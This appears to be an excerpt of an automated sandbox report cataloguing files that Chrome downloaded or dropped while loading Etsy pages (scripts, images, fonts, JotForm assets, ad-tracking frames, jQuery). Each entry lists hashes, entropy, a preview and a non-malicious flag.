                                                                                                                                                                SHA-256:FB269ECD400CEF659ABCCD8E7A4FCC6CBDE6666BAA75B465E6D629DF369D4E12
                                                                                                                                                                SHA-512:786EB63EF3DA4F84150520C5FADD5161EBCE7EF279610711493702B5F01B25214FD613305BD30C54C82E559F689A18AE3D645720CE88D98556CBED771CF547F1
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:(()=>{var e={83761:(e,r,a)=>{e.exports=a(17186)(1317)},53260:(e,r,a)=>{e.exports=a(17186)(2678)},95232:(e,r,a)=>{e.exports=a(17186)(5385)},16310:(e,r,a)=>{e.exports=a(17186)(692)},14990:(e,r,a)=>{e.exports=a(17186)(7217)},88535:(e,r,a)=>{e.exports=a(17186)(8785)},66767:(e,r,a)=>{e.exports=a(17186)(9386)},17186:e=>{"use strict";e.exports=etsy_libs_48199a5f98b47a4b8eda}};var r={};function a(t){var i=r[t];if(void 0!==i)return i.exports;var n=r[t]={exports:{}};e[t](n,n.exports,a);return n.exports}(()=>{"use strict";var e=a(66767);var r=a(14990);function t(a,t={}){const i="/api/v3/ajax/member/transcend/user-consent-preferences";const n={consent_preferences:a};if(t){t.hasOwnProperty("is_confirmed")&&(n["is_confirmed"]=t["is_confirmed"]);t.hasOwnProperty("timestamp")&&(n["timestamp"]=t["timestamp"]);t.hasOwnProperty("expiration_period_minutes")&&(n["expiration_period_minutes"]=t["expiration_period_minutes"]);t.hasOwnProperty("expiring_preferences")&&(n["expiring_preferences"]=t["expiring_pref
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:PNG image data, 29 x 100, 8-bit/color RGB, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):61
                                                                                                                                                                Entropy (8bit):4.068159130770306
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:6238F09C24C91543422122E187220E76
                                                                                                                                                                SHA1:AF47EB5B0FBAE2D9168DB1AD6CB052AD693E7B1C
                                                                                                                                                                SHA-256:08D6010BF2D8BE635E7905FE9C5E9C04EBDD5E159766717EB44EE87A00225CA4
                                                                                                                                                                SHA-512:6420691F85073D04EA54F69CD74EE80A88C4C92168A115CE0A8D82231E119788AB38E678A2CB6E7B6DE4A8CEADEFD5266967964520D60CDF90611DA325432AA7
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:.PNG........IHDR.......d.......Q....IDAT.....$.....IEND.B`.
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 680x540, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):31396
                                                                                                                                                                Entropy (8bit):7.992637444925615
                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:1A364F88B9268FDD6842D897562F840E
                                                                                                                                                                SHA1:3550661B547DB0B956F30EB4FEE39529B21A5D55
                                                                                                                                                                SHA-256:8DD550682FD09BF118487F91EB3A38A872F7AECC8B6B2255F1413D3C391D5047
                                                                                                                                                                SHA-512:A73B596D3E4AB8CACD60C946CAB7CBD9DCAEAD48F520FF1CC76499477ACA24C87F78F8ADB6D9E2E05E3117B65FAFC26703DE6D3B7641E5CCCB38621E87D43031
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://i.etsystatic.com/24719125/c/2000/1589/0/247/il/190a0f/4157107940/il_680x540.4157107940_eh8l.jpg
                                                                                                                                                                Preview:RIFF.z..WEBPVP8 .z..P....*....>E .E".%#.R.....gm.7.%q......=.._@-!..fz......._...=....w.GX~.{..y..~.w.<.kqX.|>..M.~....._....w.K.9.>~.....9./6.}...y......m_.?k.....L.O.o....]^g?......_.W.C....P..?..{Pz..~...!...-.o...........?.]`.E..............o..d.............g...?.~/....o..?..........}B?7.{.o..././.<^....G.._.k./.W........+.....o.......h............t~........?.......-.I...7....m............._b..?................?............}..Gp..f.4.#.\..[.{.g..&y..../}..j.........`..*-.cr......T...W....S...'....t.b.....k...). ....r...........}.....T`..........g.X[.6|.Bf.=9K.C3*..\m&...-h(#.;R.w].+ .4.I.Q.....,...?.".v.......O. vV!...1..{..h..'.L.E..U..?.4P.....j..DE..$.mb...>....L...+..*......p=QH=7..8-............N.x.............<...G........|.a..q2...!.[./.!1..z.F..]..:..0.,(.w.....@:zKYC.........`]..d;)].-Z...().nN.`.T.rt{...N.$Ypy...%..v[..E.......;...ic...B.W.......)......=_..Q.....R-...g...f.=Z.cC<u..4k_u..|..T.....$.........U.....@L?.M
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 300x300, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):31166
                                                                                                                                                                Entropy (8bit):7.993770958137289
                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:AAC51B4A80A1EBD1DD85B4D640D1C15A
                                                                                                                                                                SHA1:83493D1B09F550EFD590AD85CA315EF5B53E4D2F
                                                                                                                                                                SHA-256:2ED324B334B8D24AA89143A985FF50C99D9980548B1C39074214F3C1561DC0B5
                                                                                                                                                                SHA-512:4017ACBAC9A9E32606345537723F7D80D21A7730B4E661BEB86EC8C516EC2CD1C7444A97CF3AECE43E9B8531954B3C9BBBE91403E829630B024AA05E27B97154
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://i.etsystatic.com/7696744/r/il/e65a43/5550767229/il_300x300.5550767229_3vr6.jpg
                                                                                                                                                                Preview:RIFF.y..WEBPVP8 .y.......*,.,.>9..C"!!!.[..@..b...H. '.}...5.E...............~G.G..Hy....G...._`.._...`.t.h..z.........Y.g.......O....._...}.?..l.........~.._.~.....}`.O..........;./...|K......`_.......#...=.:..?...}....O...c....`....=....E./...?.=W..........?.............C...?.....>Z.p......=..}.F...........Y..&.IW.?....r.s..]...U.....>._ml.{.k.v.i..j.d.$..?....$.i......w...f....%.{./....7...I..T..Y..\b.n...-.x/.....^.c.w,q.?P.k.}...8.\....fO../...P.kx.O.j..3.jT.l....\x./..D.L..&..$....\[...|3.&<.=.*/|_.....z..cI....-&W>..V.y/(.8mw....l....QTi..I....j....c..*.8.t.8..%N.q*..Y<...|.??.....F?B9F..-.U.>..X...eI...I_8....Y.;s=a..G.3...v~I.."*7CN...e@....j.$L. .X.7..ngD......WM.[BS...*&Q]%...A,.vm......{1#.AS|...+|..K.).?.N..t..U..I4......z.5...ip4Ks.p3...t~R7..n.........=.&f....*...}x...+..[iL..., ..y+....6.y.....)AM....a.5mr...e7..m.r .\..9_....`.x.~E.g}..\:..L fpRW\.Aki.....UF.N.q.....Xv.\.(U\.*Di..\.}@.(;.g.....Q...m..K=.2sB.#
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 32432, version 1.0
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):32432
                                                                                                                                                                Entropy (8bit):7.992531505212164
                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:083C526531FA38F4D67D09B5B4B7A41C
                                                                                                                                                                SHA1:90EECC0DD8374548E9A6825B2135505080DF415D
                                                                                                                                                                SHA-256:733C3110F18E2329620AB9C6509B63A09BFA077D1847F9D8749977C936DF1C73
                                                                                                                                                                SHA-512:2A86FE9A65F4EE411E50FF485E2B47CF9D113905EB3441AF0B5B3922A37067F1CEEE2001699889CF3D0718934539235B511C222D7D522A316E990ECD363B218B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://www.etsy.com/assets/type/Graphik-Medium-Web.woff2
                                                                                                                                                                Preview:wOF2......~...........~Q...........................j....`..B.H..s.....H.....V..6.$..(. ..c. ..l[pbq.....t'p.Z._<_....$*k.^.,+.....p..8...3.J...$..7.o.........]..k.jv[...kZ.z......`.@....'.S..v....F./H.Xnl.+.D0Q..AL.....f._...%.Q.........E.......JT|./SFLPR......M......;?.........pI..@..rlN.d..I...'....O..6....g>......^.r.\..#.........P..i?.P..T.I.R....o..^|._..(..B.q.....w.....>BP9.)V~.Sg.t...=.....V......s_Q...xd......[...:..O9.....$..".-S.;.......@z.=.t.>/...... ....F....0.@.D3.{...:....x.....v......Q.D..., ....(...^.}.:..J{..G.'Qc.).......|I..4..<...+..#...I..s...v.~@..ru.U]8.2..U...@$.~..52..N...........!0.....A....4..4z.Y..?.;/.}...Y.....d.t+.BU a#..CV.gu.uOMG...b.C...kMz.n...... .f....^A.........W$22..DZ"--%%%.Sr...../..O..zp...@T.....<B.3.}l.W...iSD.I?).....5...oS3...d.$.v.!......%.....U..S.t.Y....p.Vsv:.%...L.v80.eT....~Oc.....Ig=.t...X8E:.73 0o0..D.|......+.K[\.K|...AI.!..H*r3.,9.|....>.b........gZ.)n..M....).t6......Nn.U......Y
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):6417
                                                                                                                                                                Entropy (8bit):4.728794319759142
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:27F180956774D0ED52C65CEA8E0D4F09
                                                                                                                                                                SHA1:1DB68F34D1D0279D1364261A1DF7790DE6439110
                                                                                                                                                                SHA-256:B4686D1F9905BA4CA42EB7B9E8E595D8CF6E9823EE3079E38791884626365730
                                                                                                                                                                SHA-512:146821D17E0E2E2DDC087DD2A21FFA6B578A2DA254AAD681B070D215F498322FEC7362FCE073697C9B3CDAD1A9A1482F07BA009AAA94B5328940751D05D54D28
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://cdn02.jotfor.ms/js/errorNavigation.js?v=3.3.57466
                                                                                                                                                                Preview:(function(global, factory) {. if (window.FORM_MODE === 'cardform') return;. typeof exports === "object" && typeof module !== "undefined". ? (module.exports = factory()). : typeof define === "function" && define.amd. ? define(factory). : ((global = global || self), (global.ErrorNavigation = factory()));.})(this, function() { 'use strict';. var state = {. section: null,. current: -1,. errors: [],. scrollToBottomOnClose: true,. };. . function getMessage() {. if (state.errors.length <= 0) {. return JotForm.texts.doneMessage;. }.. var msg="";. if (state.errors.length === 1) {. msg = JotForm.texts.oneError;. }. else{. msg = JotForm.texts.multipleError;. }.. msg = msg.replace('{count}', '<strong>' + state.errors.length + '</strong>');. return msg;. }.. function createNavigation(section) {. var container = document.createElement('div');. container.classList.add('error-navigation-container');. container.style.
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):223
                                                                                                                                                                Entropy (8bit):5.311677015965872
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:61BE0E1270DD68ABAA035BBE8EC9DD7D
                                                                                                                                                                SHA1:3927A4D9A6C64E37996D74400ADACE6443472940
                                                                                                                                                                SHA-256:52A1D0F52F460E327988C355867521B4DE4AF61472D94935AFB22DD20CFEA935
                                                                                                                                                                SHA-512:36A8F049E4CD41DBDD3F1BD95B13A171F48B48821DD3863121D3851144E950800292F3349D0158681167FAB30EECED84376C2350B9D9CF70446469A56056821D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://d.agkn.com/iframe/10898/?che=1728513234&gauid=759860771.1728513240
                                                                                                                                                                Preview:<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">.<html>.<head>.<meta http-equiv="pragma" content="no-cache">.</head>.<body style="border: 0; margin: 0; padding: 0;">.</body>.</html>
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (3168), with no line terminators
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):3168
                                                                                                                                                                Entropy (8bit):4.96213739645873
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:4821AF91EA69D4B12822A1B7FD116EE1
                                                                                                                                                                SHA1:CF453003E8727081FCF75A1A0E683FB1534E5240
                                                                                                                                                                SHA-256:D4E193083A57FFD9E7CE23B7347A2DD1F63F8D36961301E48F74B52889599C1C
                                                                                                                                                                SHA-512:26C57E5BAEB3A90643F55D2525C422A88C144E20996DAADFC34059289A67333D7C9517A46F41CFB332D9C2C93FBAB542F49499465DEC098C86D159D3AF8D3417
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://cdn01.jotfor.ms/stylebuilder/static/form-common.css?v=8061673
                                                                                                                                                                Preview:.app.isBuilder .form-all{margin:0 auto 20px!important}.formPage-container .formPage-each:not(:first-of-type) .form-all:before{display:none}.form-cover-wrapper+.form-all{margin-top:0}.form-cover-wrapper+.form-all:before{content:none}.form-cover-wrapper{margin:0 auto 32px;padding-top:32px;position:relative;overflow:hidden;transition:all .33s ease}.form-cover-wrapper.form-page-cover-image-align-left .form-page-cover-image-wrapper{-ms-flex-pack:start;justify-content:flex-start}.form-cover-wrapper.form-page-cover-image-align-center .form-page-cover-image-wrapper{-ms-flex-pack:center;justify-content:center}.form-cover-wrapper.form-page-cover-image-align-right .form-page-cover-image-wrapper{-ms-flex-pack:end;justify-content:flex-end}.form-cover-wrapper .form-page-cover-text{line-height:50px}.form-cover-wrapper .add-form-logo{display:-ms-flexbox;display:flex;background-repeat:no-repeat;border:0;background-color:transparent;padding-block:0;padding-inline:0}.form-page-cover-image-wrapper{width:1
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (57272)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):57516
                                                                                                                                                                Entropy (8bit):5.303665475562682
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:38EBBC2E74C16F6A103EDC171D03A950
                                                                                                                                                                SHA1:58439E3721E52BE2819D3DF6BBCC9FB78D1B789D
                                                                                                                                                                SHA-256:5509E0A6C7224B59786E4F8F5A7D16FB3AF78BBCE15598BE29BB12588C43B035
                                                                                                                                                                SHA-512:5811E4DD77E34FF096055E7747F5D90EA57055A1E606A39D8729201A27BEC17D9359FB3257E7C76257113DC84999D4DB2900B3DDED6AE4E3F3A421ED5D68ED12
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:// For license information, please see: https://www.etsy.com/ac/evergreenVendor/js/en-US/etsy_libs.48199a5f98b47a4b8eda.js.LICENSE.var etsy_libs_48199a5f98b47a4b8eda;(()=>{var e={1632:(e,t,n)=>{"use strict";n.r(t);n.d(t,{default:()=>a});var r=n(9386);var o=n(7464);var s=n(7217);function a(e,t={}){const n={name:e};const a="/api/v3/ajax/bespoke/member"+(0,o["default"])("/neu/specs/{{name}}",n);const i={};if(t){t.hasOwnProperty("log_performance_metrics")&&(i["log_performance_metrics"]=t["log_performance_metrics"]);t.hasOwnProperty("stats_sample_rate")&&(i["stats_sample_rate"]=t["stats_sample_rate"]);t.hasOwnProperty("specs")&&(i["specs"]=t["specs"]);t.hasOwnProperty("view_data_event_name")&&(i["view_data_event_name"]=t["view_data_event_name"])}const c=(e,t)=>{var n,r;if(["search_results","async_search_results","listing_async_review_variations","shop-reviews","join_neu_controller"].includes(null!==(n=null===(r=e.split("?")[0])||void 0===r?void 0:r.toLowerCase())&&void 0!==n?n:e.toLowerCase
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (20816), with no line terminators
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):20816
                                                                                                                                                                Entropy (8bit):5.562404341802462
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:FA84BABF838090956E9892BCB443C445
                                                                                                                                                                SHA1:23E3AAF078C6D1CC1CD9EF1D7180299CC5704B0D
                                                                                                                                                                SHA-256:A3EE84CA798BB989DB22C2A4B39410EDA06862F7ECC67B2BDF405C7806DE1952
                                                                                                                                                                SHA-512:294CE32870F656FD094228955936AD56BBF059FFE732ED9D81E9CF03FF0594A060CC3DEF32410BE2A270D68B88862C2334DC272DFD9F25B801C2875881206A97
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://td.doubleclick.net/td/rul/995917074?random=1728513240015&cv=11&fst=1728513240015&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4a70v883287104z86935543za201zb6935543&gcd=13t3t3t3t5l1&dma=0&tag_exp=101529666~101671035~101686685~101747727&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.etsy.com%2F&ref=https%3A%2F%2Fw4.ischievou8.ru%2F&hn=www.googleadservices.com&frm=0&tiba=Etsy%20-%20Shop%20for%20handmade%2C%20vintage%2C%20custom%2C%20and%20unique%20gifts%20for%20everyone&npa=0&pscdl=noapi&auid=2111120285.1728513237&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ecomm_prodid%3D%3Becomm_pagetype%3Dhome%3Becomm_totalvalue%3D%3Becomm_rec_prodid%3D%3Becomm_category%3D%3Becomm_pvalue%3D%3Becomm_quantity%3D%3Ba%3D%3Bg%3D%3Bhasaccount%3Dfalse%3Bcqs%3D%3Brp%3D%3Bly%3D%3Bhs%3D%3B_google_crm_id%3D%3Bads_data_redaction%3Dfalse
                                                                                                                                                                Preview:<html><head><meta http-equiv="origin-trial" content="Avh5Ny0XEFCyQ7+oNieXskUrqY8edUzL5/XrwKlGjARQHW4TFRK+jVd5HnDIpY20n5OLHfgU4ku7x48N3uhG/A0AAABxeyJvcmlnaW4iOiJodHRwczovL2RvdWJsZWNsaWNrLm5ldDo0NDMiLCJmZWF0dXJlIjoiUHJpdmFjeVNhbmRib3hBZHNBUElzIiwiZXhwaXJ5IjoxNjk1MTY3OTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0="></head><body><script>var ig_list={"interestGroups":[{"action":0,"expirationTimeInSeconds":46656000,"interestGroupAttributes":{"owner":"https://td.doubleclick.net","name":"4s2111120285.1728513237","biddingLogicUrl":"https://td.doubleclick.net/td/bjs","dailyUpdateUrl":"https://td.doubleclick.net/td/update?ig_name=4s2111120285.1728513237\u0026ig_key=1sNHMyMTExMTIwMjg1LjE3Mjg1MTMyMzc!2sac7u2Q!3sAAptDV5KcUY5\u0026tag_eid=44805652","trustedBiddingSignalsUrl":"https://td.doubleclick.net/td/bts","trustedBiddingSignalsKeys":["1sKtlZXA!2sac7u2Q!3sAAptDV5KcUY5","1i44805652"],"userBiddingSignals":[["597356594","8023594364","7182947944"],null,1728513241467701],"ads":[{"renderUrl":"https://tdsf.doubleclick
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, progressive, precision 8, 300x300, components 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):10535
                                                                                                                                                                Entropy (8bit):7.850934087602601
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:1A694741D7D7F8F5C14ABE2F41AFC8CA
                                                                                                                                                                SHA1:CCB2A1B624B1189051DCDA4344CC936DBC1402D5
                                                                                                                                                                SHA-256:4B2A7D12BC3E4D8FAAA8E8F7CDE2F3F0FE7998B88039BF31C65323B31FF616E0
                                                                                                                                                                SHA-512:6FB253933CAF3C0C2FE39BB1A688054E5D09E74AE962238A1FFEC79AB81D4763FE178D93CD26C23800AA99BB2E5C2C8BC0D0623C0D0023B4CE6D96C6F3A5249E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.................................................................&$&22C...........................................................&$&22C......,.,.."..........6...................................................................f(.-OC.7.h.."3....`.Z..*...*......&.*. ........[.I.......'.f..7.*.D.2H.....cRT.. t4AP.....5....a.v.!.3...*6G...jPM.3"j.c.....)2.P.$...H|o$R$...C...@..qs..c........g.x.km9...}....,&D(6.R.hP+!k ..Y23.)..'Y.
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, progressive, precision 8, 300x300, components 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):44847
                                                                                                                                                                Entropy (8bit):7.9656936095986
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:1C98208395A45C44198EA4B9C424F2D6
                                                                                                                                                                SHA1:9400CD0983AD9426E102C065CDE10792C40EB391
                                                                                                                                                                SHA-256:3F9765769491BC76FD74BB579BF3E2131228D8CF5ED9775E929F2A0612DE7A62
                                                                                                                                                                SHA-512:D1C480B03FC110F050D13FAED28A27487ECCA59D4819A78B0E7007D1485037FEC768D5D20FC5CDE72DD42844E345967B6007190C9A649D41DBA2E3633A907BDE
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0......................................................................*................................................................*......,.,.."..........8.....................................................................l...'@rX..,YI%T8............U"J...y.p.d|....5.]...G..9.*d...d..{,#:G6../m.P...K...9.2Fvm8.g...~.........P..\.(.k...q.<.."...9.0.Q).6......kIC,}..U.....8.............E...3.....+...g.n&...R.H.{X...H
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):89501
                                                                                                                                                                Entropy (8bit):5.289893677458563
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                                SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                                SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                                SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                                                                                                Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 190x128, components 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):6387
                                                                                                                                                                Entropy (8bit):7.910781767118036
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:9692342B179308B671E48E9F4D171DA8
                                                                                                                                                                SHA1:F6354E58195B95111CA99D674DE2D3D7FD0EB35A
                                                                                                                                                                SHA-256:58A8DCF36CA43AA7B13912D7123B89391E2FB6D19FF8A96B3DA34281486A4AD2
                                                                                                                                                                SHA-512:1E3B8D6A202931E41A3FA7CFF11612F0B212C54861D53BBA74378F29D2CFE183682D118B2383168A5CFD2AE1F800B41DC722AEA3ECA4D2B02054DA85D32278C3
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....Gn?J..h..Q.Q..b.o.@...p..,........j........._....V.G{.8..g..<.O~...z..Q...........J.d....JpL........q..>..*........V..`.NU....Wv...`.w.YD.[8..r.>....S..Z..a.+.N.B}=.x...IB?3..d..).....#.Fv..#8..*..K2..Y~......J_..*.vl..>.J+...E..z98.|...9..C.!........L..y...H.7.T.~.,X[>.$.z*.F...[..L......[M.Xb..}..*...4.mb.;.sO$..Q..xv[$,d....{..e.fRL. A..?..c.'..Xn.0.g.G
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (5242), with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):5242
                                                                                                                                                                Entropy (8bit):5.90904417456025
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:7F9A7E0EA90D46DD06275C06BF5A0527
                                                                                                                                                                SHA1:88668DA48E6AA11BFA8022B1D07B2748BA4E5835
                                                                                                                                                                SHA-256:EDB0E55217BA37035F41A3B8F20DC6CC18345A331FBA561A8C6259D1988DE400
                                                                                                                                                                SHA-512:396BA083CF3B64C9454E48FDFFC1BF3732D707B83E9DA718DA30D70E3BC8C327A2E439D69BD6C1DD7963CA858779E7B83858CE950498FF0542AB1AB3C4FA10A0
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (65533), with no line terminators
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):704583
                                                                                                                                                                Entropy (8bit):5.42123117310688
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:0960B0B99C86D423B9E44107A6C0BC77
                                                                                                                                                                SHA1:58117C27A6240C8C1CA4A821C2A6D7FFA4331305
                                                                                                                                                                SHA-256:AB1EC3BA5E18D983351EF8454960D1A8E2D81E10E927FC5294A57C4EBA586A59
